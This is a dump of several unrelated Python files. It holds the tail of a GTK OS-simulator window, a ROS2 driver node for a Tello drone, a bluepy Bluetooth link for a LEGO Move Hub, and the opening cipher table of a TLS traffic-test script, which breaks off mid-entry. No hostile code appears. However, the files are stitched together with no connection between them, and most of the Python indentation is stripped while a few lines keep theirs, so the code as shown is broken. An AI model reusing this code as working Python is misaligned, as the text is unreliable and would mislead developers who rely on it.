pixbuf = GdkPixbuf.Pixbuf.new_from_file(self.AVG_INNER_PLOT)
pixbuf = pixbuf.scale_simple(width, height, GdkPixbuf.InterpType.BILINEAR)
self.images['inner'].set_from_pixbuf(pixbuf)
pixbuf = GdkPixbuf.Pixbuf.new_from_file(self.AVG_TOTAL_PLOT)
pixbuf = pixbuf.scale_simple(width, height, GdkPixbuf.InterpType.BILINEAR)
self.images['total'].set_from_pixbuf(pixbuf)
@staticmethod
def _float_range(first, last, step):
eps = 0.00001
l = []
current = first
while math.fabs(current - last) >= eps:
l.append(current)
current += step
return l
if __name__ == "__main__":
GObject.threads_init()
builder = Gtk.Builder()
builder.add_from_file(GLADE_MARKUP)
window = OsSimulatorWindow(builder)
window.show()
Gtk.main()
|
node.py
|
#!/usr/bin/env python3
import pprint
import math
import rclpy
import threading
import numpy
import time
import av
import tf2_ros
import cv2
import time
import yaml
from djitellopy import Tello
from rclpy.node import Node
from tello_msg.msg import TelloStatus, TelloID, TelloWifiConfig
from std_msgs.msg import Empty, UInt8, UInt8, Bool, String
from sensor_msgs.msg import Image, Imu, BatteryState, Temperature, CameraInfo
from geometry_msgs.msg import Twist, TransformStamped
from nav_msgs.msg import Odometry
from cv_bridge import CvBridge
import ament_index_python
# Tello ROS node class, wrapping the Tello controller object.
#
# Can be configured for multiple drones; publishes all data collected from the drone and provides control using ROS messages.
class TelloNode():
def __init__(self, node):
# ROS node
self.node = node
# Declare parameters
self.node.declare_parameter('connect_timeout', 10.0)
self.node.declare_parameter('tello_ip', '192.168.10.1')
self.node.declare_parameter('tf_base', 'map')
self.node.declare_parameter('tf_drone', 'drone')
self.node.declare_parameter('tf_pub', False)
self.node.declare_parameter('camera_info_file', '')
# Get parameters
self.connect_timeout = float(self.node.get_parameter('connect_timeout').value)
self.tello_ip = str(self.node.get_parameter('tello_ip').value)
self.tf_base = str(self.node.get_parameter('tf_base').value)
self.tf_drone = str(self.node.get_parameter('tf_drone').value)
self.tf_pub = bool(self.node.get_parameter('tf_pub').value)
self.camera_info_file = str(self.node.get_parameter('camera_info_file').value)
# Camera information loaded from calibration yaml
self.camera_info = None
# Check if camera info file was received as argument
if len(self.camera_info_file) == 0:
share_directory = ament_index_python.get_package_share_directory('tello')
self.camera_info_file = share_directory + '/ost.yaml'
# Read camera info from YAML file
with open(self.camera_info_file, 'r') as file:
self.camera_info = yaml.load(file, Loader=yaml.FullLoader)
# self.node.get_logger().info('Tello: Camera information YAML' + self.camera_info.__str__())
# Configure drone connection
Tello.TELLO_IP = self.tello_ip
Tello.RESPONSE_TIMEOUT = int(self.connect_timeout)
# Connect to drone
self.node.get_logger().info('Tello: Connecting to drone')
self.tello = Tello()
self.tello.connect()
self.node.get_logger().info('Tello: Connected to drone')
# Publishers and subscribers
self.setup_publishers()
self.setup_subscribers()
# Processing threads
self.start_video_capture()
self.start_tello_status()
self.start_tello_odom()
self.node.get_logger().info('Tello: Driver node ready')
# Setup ROS publishers of the node.
def setup_publishers(self):
self.pub_image_raw = self.node.create_publisher(Image, 'image_raw', 1)
self.pub_camera_info = self.node.create_publisher(CameraInfo, 'camera_info', 1)
self.pub_status = self.node.create_publisher(TelloStatus, 'status', 1)
self.pub_id = self.node.create_publisher(TelloID, 'id', 1)
self.pub_imu = self.node.create_publisher(Imu, 'imu', 1)
self.pub_battery = self.node.create_publisher(BatteryState, 'battery', 1)
self.pub_temperature = self.node.create_publisher(Temperature, 'temperature', 1)
self.pub_odom = self.node.create_publisher(Odometry, 'odom', 1)
# TF broadcaster
if self.tf_pub:
self.tf_broadcaster = tf2_ros.TransformBroadcaster(self.node)
# Setup the topic subscribers of the node.
def setup_subscribers(self):
self.sub_emergency = self.node.create_subscription(Empty, 'emergency', self.cb_emergency, 1)
self.sub_takeoff = self.node.create_subscription(Empty, 'takeoff', self.cb_takeoff, 1)
self.sub_land = self.node.create_subscription(Empty, 'land', self.cb_land, 1)
self.sub_control = self.node.create_subscription(Twist, 'control', self.cb_control, 1)
self.sub_flip = self.node.create_subscription(String, 'flip', self.cb_flip, 1)
self.sub_wifi_config = self.node.create_subscription(TelloWifiConfig, 'wifi_config', self.cb_wifi_config, 1)
# Get the orientation of the drone as a quaternion
def get_orientation_quaternion(self):
deg_to_rad = math.pi / 180.0
return euler_to_quaternion([
self.tello.get_yaw() * deg_to_rad,
self.tello.get_pitch() * deg_to_rad,
self.tello.get_roll() * deg_to_rad
])
# Start drone info thread
def start_tello_odom(self, rate=1.0/10.0):
def status_odom():
while True:
# TF
if self.tf_pub:
t = TransformStamped()
t.header.stamp = self.node.get_clock().now().to_msg()
t.header.frame_id = self.tf_base
t.child_frame_id = self.tf_drone
t.transform.translation.x = 0.0
t.transform.translation.y = 0.0
t.transform.translation.z = (self.tello.get_barometer()) / 100.0
self.tf_broadcaster.sendTransform(t)
# IMU
if self.pub_imu.get_subscription_count() > 0:
q = self.get_orientation_quaternion()
msg = Imu()
msg.header.stamp = self.node.get_clock().now().to_msg()
msg.header.frame_id = self.tf_drone
msg.linear_acceleration.x = self.tello.get_acceleration_x() / 100.0
msg.linear_acceleration.y = self.tello.get_acceleration_y() / 100.0
msg.linear_acceleration.z = self.tello.get_acceleration_z() / 100.0
msg.orientation.x = q[0]
msg.orientation.y = q[1]
msg.orientation.z = q[2]
msg.orientation.w = q[3]
self.pub_imu.publish(msg)
# Odometry
if self.pub_odom.get_subscription_count() > 0:
q = self.get_orientation_quaternion()
odom_msg = Odometry()
odom_msg.header.stamp = self.node.get_clock().now().to_msg()
odom_msg.header.frame_id = self.tf_base
odom_msg.pose.pose.orientation.x = q[0]
odom_msg.pose.pose.orientation.y = q[1]
odom_msg.pose.pose.orientation.z = q[2]
odom_msg.pose.pose.orientation.w = q[3]
odom_msg.twist.twist.linear.x = float(self.tello.get_speed_x()) / 100.0
odom_msg.twist.twist.linear.y = float(self.tello.get_speed_y()) / 100.0
odom_msg.twist.twist.linear.z = float(self.tello.get_speed_z()) / 100.0
self.pub_odom.publish(odom_msg)
time.sleep(rate)
thread = threading.Thread(target=status_odom)
thread.start()
return thread
# Start drone info thread
def start_tello_status(self, rate=1.0/2.0):
def status_loop():
while True:
# Battery
if self.pub_battery.get_subscription_count() > 0:
msg = BatteryState()
msg.header.frame_id = self.tf_drone
msg.percentage = float(self.tello.get_battery())
msg.voltage = 3.8
msg.design_capacity = 1.1
msg.present = True
msg.power_supply_technology = 2 # POWER_SUPPLY_TECHNOLOGY_LION
msg.power_supply_status = 2 # POWER_SUPPLY_STATUS_DISCHARGING
self.pub_battery.publish(msg)
# Temperature
if self.pub_temperature.get_subscription_count() > 0:
msg = Temperature()
msg.header.frame_id = self.tf_drone
msg.temperature = self.tello.get_temperature()
msg.variance = 0.0
self.pub_temperature.publish(msg)
# Tello Status
if self.pub_status.get_subscription_count() > 0:
msg = TelloStatus()
msg.acceleration.x = self.tello.get_acceleration_x()
msg.acceleration.y = self.tello.get_acceleration_y()
msg.acceleration.z = self.tello.get_acceleration_z()
msg.speed.x = float(self.tello.get_speed_x())
msg.speed.y = float(self.tello.get_speed_y())
msg.speed.z = float(self.tello.get_speed_z())
msg.pitch = self.tello.get_pitch()
msg.roll = self.tello.get_roll()
msg.yaw = self.tello.get_yaw()
msg.barometer = int(self.tello.get_barometer())
msg.distance_tof = self.tello.get_distance_tof()
msg.fligth_time = self.tello.get_flight_time()
msg.battery = self.tello.get_battery()
msg.highest_temperature = self.tello.get_highest_temperature()
msg.lowest_temperature = self.tello.get_lowest_temperature()
msg.temperature = self.tello.get_temperature()
msg.wifi_snr = self.tello.query_wifi_signal_noise_ratio()
self.pub_status.publish(msg)
# Tello ID
if self.pub_id.get_subscription_count() > 0:
msg = TelloID()
msg.sdk_version = self.tello.query_sdk_version()
msg.serial_number = self.tello.query_serial_number()
self.pub_id.publish(msg)
# Camera info
if self.pub_camera_info.get_subscription_count() > 0:
msg = CameraInfo()
                    # The calibration file uses the standard ost.yaml layout, which keeps each matrix under a 'data' key
                    msg.height = self.camera_info['image_height']
                    msg.width = self.camera_info['image_width']
                    msg.distortion_model = self.camera_info['distortion_model']
                    msg.d = self.camera_info['distortion_coefficients']['data']
                    msg.k = self.camera_info['camera_matrix']['data']
                    msg.r = self.camera_info['rectification_matrix']['data']
                    msg.p = self.camera_info['projection_matrix']['data']
self.pub_camera_info.publish(msg)
# Sleep
time.sleep(rate)
thread = threading.Thread(target=status_loop)
thread.start()
return thread
# Start video capture thread.
def start_video_capture(self, rate=1.0/30.0):
# Enable tello stream
self.tello.streamon()
# OpenCV bridge
self.bridge = CvBridge()
def video_capture_thread():
frame_read = self.tello.get_frame_read()
while True:
# Get frame from drone
frame = frame_read.frame
# Publish opencv frame using CV bridge
msg = self.bridge.cv2_to_imgmsg(numpy.array(frame), 'bgr8')
msg.header.frame_id = self.tf_drone
self.pub_image_raw.publish(msg)
time.sleep(rate)
        # We need to run the capture loop in a separate thread, otherwise blocking operations would prevent frames from being published
thread = threading.Thread(target=video_capture_thread)
thread.start()
return thread
# Terminate the code and shutdown node.
def terminate(self, err):
self.node.get_logger().error(str(err))
self.tello.end()
rclpy.shutdown()
# Stop all movement in the drone
def cb_emergency(self, msg):
self.tello.emergency()
# Drone takeoff message control
def cb_takeoff(self, msg):
self.tello.takeoff()
# Land the drone message callback
def cb_land(self, msg):
self.tello.land()
# Control messages received use to control the drone "analogically"
#
# This method of controls allow for more precision in the drone control.
#
# Receives the linear and angular velocities to be applied from -100 to 100.
def cb_control(self, msg):
self.tello.send_rc_control(int(msg.linear.x), int(msg.linear.y), int(msg.linear.z), int(msg.angular.z))
# Configure the wifi credential that should be used by the drone.
#
# The drone will be restarted after the credentials are changed.
def cb_wifi_config(self, msg):
self.tello.set_wifi_credentials(msg.ssid, msg.password)
# Perform a drone flip in a direction specified.
#
# Directions can be "r" for right, "l" for left, "f" for forward or "b" for backward.
def cb_flip(self, msg):
self.tello.flip(msg.data)
# Convert a rotation from euler to quaternion.
def euler_to_quaternion(r):
(yaw, pitch, roll) = (r[0], r[1], r[2])
qx = math.sin(roll/2) * math.cos(pitch/2) * math.cos(yaw/2) - math.cos(roll/2) * math.sin(pitch/2) * math.sin(yaw/2)
qy = math.cos(roll/2) * math.sin(pitch/2) * math.cos(yaw/2) + math.sin(roll/2) * math.cos(pitch/2) * math.sin(yaw/2)
qz = math.cos(roll/2) * math.cos(pitch/2) * math.sin(yaw/2) - math.sin(roll/2) * math.sin(pitch/2) * math.cos(yaw/2)
qw = math.cos(roll/2) * math.cos(pitch/2) * math.cos(yaw/2) + math.sin(roll/2) * math.sin(pitch/2) * math.sin(yaw/2)
return [qx, qy, qz, qw]
# Convert rotation from quaternion to euler.
def quaternion_to_euler(q):
(x, y, z, w) = (q[0], q[1], q[2], q[3])
t0 = +2.0 * (w * x + y * z)
t1 = +1.0 - 2.0 * (x * x + y * y)
roll = math.atan2(t0, t1)
t2 = +2.0 * (w * y - z * x)
t2 = +1.0 if t2 > +1.0 else t2
t2 = -1.0 if t2 < -1.0 else t2
pitch = math.asin(t2)
t3 = +2.0 * (w * z + x * y)
t4 = +1.0 - 2.0 * (y * y + z * z)
yaw = math.atan2(t3, t4)
return [yaw, pitch, roll]
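# Round-trip sanity check (sketch): a pure yaw rotation should survive both conversions.
#   q = euler_to_quaternion([math.pi / 2, 0.0, 0.0])
#   assert all(abs(a - b) < 1e-6 for a, b in zip(quaternion_to_euler(q), [math.pi / 2, 0.0, 0.0]))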
def main(args=None):
rclpy.init(args=args)
node = rclpy.create_node('tello')
drone = TelloNode(node)
rclpy.spin(node)
    drone.tello.end()
node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
cbluepy.py
|
import logging
import re
from threading import Thread, Event
from bluepy import btle
from pylgbst.comms import Connection, LEGO_MOVE_HUB
from pylgbst.utilities import str2hex, queue
log = logging.getLogger('comms-bluepy')
COMPLETE_LOCAL_NAME_ADTYPE = 9
PROPAGATE_DISPATCHER_EXCEPTION = False
def _get_iface_number(controller):
"""bluepy uses iface numbers instead of full names."""
if not controller:
return None
m = re.search(r'hci(\d+)$', controller)
if not m:
raise ValueError('Cannot find iface number in {}.'.format(controller))
return int(m.group(1))
class BluepyDelegate(btle.DefaultDelegate):
def __init__(self, handler):
btle.DefaultDelegate.__init__(self)
self._handler = handler
def handleNotification(self, cHandle, data):
log.debug('Incoming notification')
self._handler(cHandle, data)
# We need a separate thread to wait for notifications,
# but calling peripheral's methods from different threads creates issues,
# so we will wrap all the calls into a thread
class BluepyThreadedPeripheral(object):
def __init__(self, addr, addrType, controller):
self._call_queue = queue.Queue()
self._addr = addr
self._addrType = addrType
self._iface_number = _get_iface_number(controller)
self._disconnect_event = Event()
self._dispatcher_thread = Thread(target=self._dispatch_calls)
self._dispatcher_thread.setDaemon(True)
self._dispatcher_thread.setName("Bluepy call dispatcher")
self._dispatcher_thread.start()
def _dispatch_calls(self):
self._peripheral = btle.Peripheral(self._addr, self._addrType, self._iface_number)
try:
while not self._disconnect_event.is_set():
try:
try:
method = self._call_queue.get(False)
method()
except queue.Empty:
pass
self._peripheral.waitForNotifications(1.)
except Exception as ex:
log.exception('Exception in call dispatcher thread', exc_info=ex)
if PROPAGATE_DISPATCHER_EXCEPTION:
log.error("Terminating dispatcher thread.")
raise
finally:
self._peripheral.disconnect()
def write(self, handle, data):
self._call_queue.put(lambda: self._peripheral.writeCharacteristic(handle, data))
def set_notify_handler(self, handler):
delegate = BluepyDelegate(handler)
self._call_queue.put(lambda: self._peripheral.withDelegate(delegate))
def disconnect(self):
self._disconnect_event.set()
class BluepyConnection(Connection):
def __init__(self, controller='hci0'):
Connection.__init__(self)
self._peripheral = None # :type BluepyThreadedPeripheral
self._controller = controller
def connect(self, hub_mac=None):
log.debug("Trying to connect client to MoveHub with MAC: %s", hub_mac)
scanner = btle.Scanner()
while not self._peripheral:
log.info("Discovering devices...")
scanner.scan(1)
devices = scanner.getDevices()
for dev in devices:
address = dev.addr
addressType = dev.addrType
name = dev.getValueText(COMPLETE_LOCAL_NAME_ADTYPE)
log.debug("Found dev, name: {}, address: {}".format(name, address))
if (not hub_mac and name == LEGO_MOVE_HUB) or hub_mac == address:
logging.info("Found %s at %s", name, address)
self._peripheral = BluepyThreadedPeripheral(address, addressType, self._controller)
break
return self
def disconnect(self):
self._peripheral.disconnect()
def write(self, handle, data):
log.debug("Writing to handle %s: %s", handle, str2hex(data))
self._peripheral.write(handle, data)
def set_notify_handler(self, handler):
self._peripheral.set_notify_handler(handler)
def is_alive(self):
return True
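# Usage sketch (assumes a powered-on LEGO Move Hub in range and a working hci0 adapter):
#   conn = BluepyConnection('hci0').connect()
#   conn.set_notify_handler(lambda handle, data: log.info("notify %s: %s", handle, str2hex(data)))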
|
term.py
|
__author__ = 'Shirish Pal'
import os
import subprocess
import sys
import argparse
import json
import jinja2
import time
from threading import Thread
import pdb
import requests
supported_ciphers = [
{'cipher_name' : 'AES128-SHA',
'cipher' : '{AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '10.2',
'server_ip_prefix' : '100.2'
},
{'cipher_name' : 'AES256-SHA',
'cipher' : '{AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '11.2',
'server_ip_prefix' : '101.2'
},
{'cipher_name' : 'DHE-RSA-AES128-SHA',
'cipher' : '{DHE-RSA-AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '12.2',
'server_ip_prefix' : '102.2'
},
{'cipher_name' : 'DHE-RSA-AES256-SHA',
'cipher' : '{DHE-RSA-AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '13.2',
'server_ip_prefix' : '103.2'
},
{'cipher_name' : 'DHE-RSA-AES128-GCM-SHA256',
'cipher' : '{DHE-RSA-AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '14.2',
'server_ip_prefix' : '104.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES128-SHA',
'cipher' : '{ECDHE-ECDSA-AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '15.2',
'server_ip_prefix' : '105.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES256-SHA',
'cipher' : '{ECDHE-ECDSA-AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '16.2',
'server_ip_prefix' : '106.2'
},
{'cipher_name' : 'ECDHE-RSA-AES128-SHA',
'cipher' : '{ECDHE-RSA-AES128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '17.2',
'server_ip_prefix' : '107.2'
},
{'cipher_name' : 'ECDHE-RSA-AES256-SHA',
'cipher' : '{ECDHE-RSA-AES256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '18.2',
'server_ip_prefix' : '108.2'
},
{'cipher_name' : 'ECDHE-ECDSA-CHACHA20-POLY1305',
'cipher' : '{ECDHE-ECDSA-CHACHA20-POLY1305}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '19.2',
'server_ip_prefix' : '109.2'
},
{'cipher_name' : 'DHE-RSA-CHACHA20-POLY1305',
'cipher' : '{DHE-RSA-CHACHA20-POLY1305}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '20.2',
'server_ip_prefix' : '110.2'
},
{'cipher_name' : 'CAMELLIA128-SHA',
'cipher' : '{CAMELLIA128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '21.2',
'server_ip_prefix' : '111.2'
},
{'cipher_name' : 'CAMELLIA256-SHA',
'cipher' : '{CAMELLIA256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '22.2',
'server_ip_prefix' : '112.2'
},
{'cipher_name' : 'DHE-RSA-CAMELLIA128-SHA',
'cipher' : '{DHE-RSA-CAMELLIA128-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '23.2',
'server_ip_prefix' : '113.2'
},
{'cipher_name' : 'DHE-RSA-CAMELLIA256-SHA',
'cipher' : '{DHE-RSA-CAMELLIA256-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '24.2',
'server_ip_prefix' : '114.2'
},
{'cipher_name' : 'AES128-SHA256',
'cipher' : '{AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '25.2',
'server_ip_prefix' : '115.2'
},
{'cipher_name' : 'AES256-SHA256',
'cipher' : '{AES256-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '26.2',
'server_ip_prefix' : '116.2'
},
{'cipher_name' : 'DHE-RSA-AES128-SHA256',
'cipher' : '{DHE-RSA-AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '27.2',
'server_ip_prefix' : '117.2'
},
{'cipher_name' : 'AES128-GCM-SHA256',
'cipher' : '{AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '28.2',
'server_ip_prefix' : '118.2'
},
{'cipher_name' : 'AES256-GCM-SHA384',
'cipher' : '{AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '29.2',
'server_ip_prefix' : '119.2'
},
{'cipher_name' : 'ECDHE-RSA-AES128-GCM-SHA256',
'cipher' : '{ECDHE-RSA-AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '30.2',
'server_ip_prefix' : '120.2'
},
{'cipher_name' : 'ECDHE-RSA-AES256-GCM-SHA384',
'cipher' : '{ECDHE-RSA-AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '31.2',
'server_ip_prefix' : '121.2'
},
{'cipher_name' : 'ECDHE-RSA-AES128-SHA256',
'cipher' : '{ECDHE-RSA-AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '32.2',
'server_ip_prefix' : '122.2'
},
{'cipher_name' : 'ECDHE-RSA-AES256-SHA384',
'cipher' : '{ECDHE-RSA-AES256-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '33.2',
'server_ip_prefix' : '123.2'
},
{'cipher_name' : 'DHE-RSA-AES256-SHA256',
'cipher' : '{DHE-RSA-AES256-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '34.2',
'server_ip_prefix' : '124.2'
},
{'cipher_name' : 'DHE-RSA-AES256-GCM-SHA384',
'cipher' : '{DHE-RSA-AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '35.2',
'server_ip_prefix' : '125.2'
},
{'cipher_name' : 'ECDHE-RSA-CHACHA20-POLY1305',
'cipher' : '{ECDHE-RSA-CHACHA20-POLY1305}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '36.2',
'server_ip_prefix' : '126.2'
},
{'cipher_name' : 'TLS_AES_128_GCM_SHA256',
'cipher' : '{TLS_AES_128_GCM_SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : 0,
'tls1_3' : '{tls1_3}',
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '37.2',
'server_ip_prefix' : '139.2'
},
{'cipher_name' : 'TLS_AES_256_GCM_SHA384',
'cipher' : '{TLS_AES_256_GCM_SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : 0,
'tls1_3' : '{tls1_3}',
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '38.2',
'server_ip_prefix' : '128.2'
},
{'cipher_name' : 'TLS_CHACHA20_POLY1305_SHA256',
'cipher' : '{TLS_CHACHA20_POLY1305_SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : 0,
'tls1_3' : '{tls1_3}',
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '39.2',
'server_ip_prefix' : '129.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES128-GCM-SHA256',
'cipher' : '{ECDHE-ECDSA-AES128-GCM-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '40.2',
'server_ip_prefix' : '130.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES256-GCM-SHA384',
'cipher' : '{ECDHE-ECDSA-AES256-GCM-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '41.2',
'server_ip_prefix' : '131.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES128-SHA256',
'cipher' : '{ECDHE-ECDSA-AES128-SHA256}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '42.2',
'server_ip_prefix' : '132.2'
},
{'cipher_name' : 'ECDHE-ECDSA-AES256-SHA384',
'cipher' : '{ECDHE-ECDSA-AES256-SHA384}',
'sslv3': 0,
'tls1': 0,
'tls1_1': 0,
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server2.cert',
'srv_key' : '/rundir/certs/server2.key',
'client_ip_prefix' : '43.2',
'server_ip_prefix' : '133.2'
},
{'cipher_name' : 'RC4-MD5',
'cipher' : '{RC4-MD5}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '44.2',
'server_ip_prefix' : '134.2'
},
{'cipher_name' : 'RC4-SHA',
'cipher' : '{RC4-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
'srv_cert' : '/rundir/certs/server.cert',
'srv_key' : '/rundir/certs/server.key',
'client_ip_prefix' : '45.2',
'server_ip_prefix' : '135.2'
},
{'cipher_name' : 'DES-CBC-SHA',
'cipher' : '{DES-CBC-SHA}',
'sslv3' : '{sslv3}',
'tls1' : '{tls1}',
'tls1_1' : '{tls1_1}',
'tls1_2' : '{tls1_2}',
'tls1_3' : 0,
